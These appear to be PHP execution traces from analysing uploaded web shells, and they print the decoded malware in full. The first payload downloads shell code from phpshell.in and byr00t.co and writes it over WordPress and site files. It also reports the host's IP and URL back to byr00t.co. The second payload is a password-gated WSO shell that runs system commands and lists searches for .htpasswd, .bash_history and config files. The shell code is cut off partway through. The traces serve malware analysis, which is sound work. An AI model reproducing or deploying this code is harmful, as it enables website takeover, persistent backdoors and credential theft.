"/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . 
"/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	0
4	13	0	0.008384	1144192	base64_decode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.008407	1144280
4	13	R			'http://byr00t.co/l-'
4	14	0	0.008424	1144248	GetIP	1		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.008438	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008457	1144280
5	15	R			FALSE
5	16	0	0.008471	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008498	1144280
5	16	R			FALSE
5	17	0	0.008512	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008527	1144320
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008608	1144288
4	14	R			'127.0.0.1'
4	18	0	0.008625	1144328	base64_encode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php.suspected'
4	18	1	0.008641	1144456
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	19	0	0.008677	1144320	function_exists	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008693	1144360
4	19	R			TRUE
4	20	0	0.008706	1144320	curl_init	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008730	1145232
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008759	1145232	curl_setopt	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	21	1	0.008781	1145328
4	21	R			TRUE
4	22	0	0.008794	1145232	curl_setopt	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008811	1145328
4	22	R			TRUE
4	23	0	0.008823	1145232	curl_exec	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.053580	1145264
4	23	R			''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.053648	1145232	curl_close	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.053716	1144376
4	24	R			NULL
4	25	0	0.053734	1144344	file_get_contents	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	25	1	0.916635	1148056
4	25	R			''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.916740	1148016	define	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.916759	1148120
4	26	R			TRUE
4	27	0	0.916774	1148048	strpos	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.916791	1148120
4	27	R			FALSE
4	28	0	0.916804	1148048	session_start	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.916898	1148800
4	28	R			TRUE
4	29	0	0.916913	1148800	error_reporting	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.916927	1148840
4	29	R			0
4	30	0	0.916940	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.916956	1148872
4	30	R			''
4	31	0	0.916969	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.916984	1148872
4	31	R			''
4	32	0	0.916996	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.917010	1148872
4	32	R			'1'
4	33	0	0.917022	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.917037	1148904
4	33	R			'30'
4	34	0	0.917050	1148800	set_time_limit	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.917064	1148864
4	34	R			FALSE
3	12	1	0.917086	1150312
2	7	1	0.917105	1063288
1	3	1	0.917112	1061712
1	35	0	0.917119	1061744	Error->__toString	0		Unknown	0	0
2	36	0	0.917131	1061824	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.917143	1062080
2	36	R			'#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
1	35	1	0.917162	1066216
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
			0.917214	986664
TRACE END   [2023-02-12 20:09:38.328391]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249133.7685.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:45:59.666336]
1	0	1	0.000148	393512
1	3	0	0.000376	426920	{main}	1		/var/www/html/uploads/cmd.php	0	0
1		A						/var/www/html/uploads/cmd.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/cmd.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000456	426920	base64_decode	0		/var/www/html/uploads/cmd.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000476	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000497	427048	gzinflate	0		/var/www/html/uploads/cmd.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000519	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000537	427016	htmlspecialchars_decode	0		/var/www/html/uploads/cmd.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000553	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000582	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/cmd.php	4	0
3	12	0	0.005625	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? 
array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . 
-type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo 
\'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n 
.logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( 
(req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n 
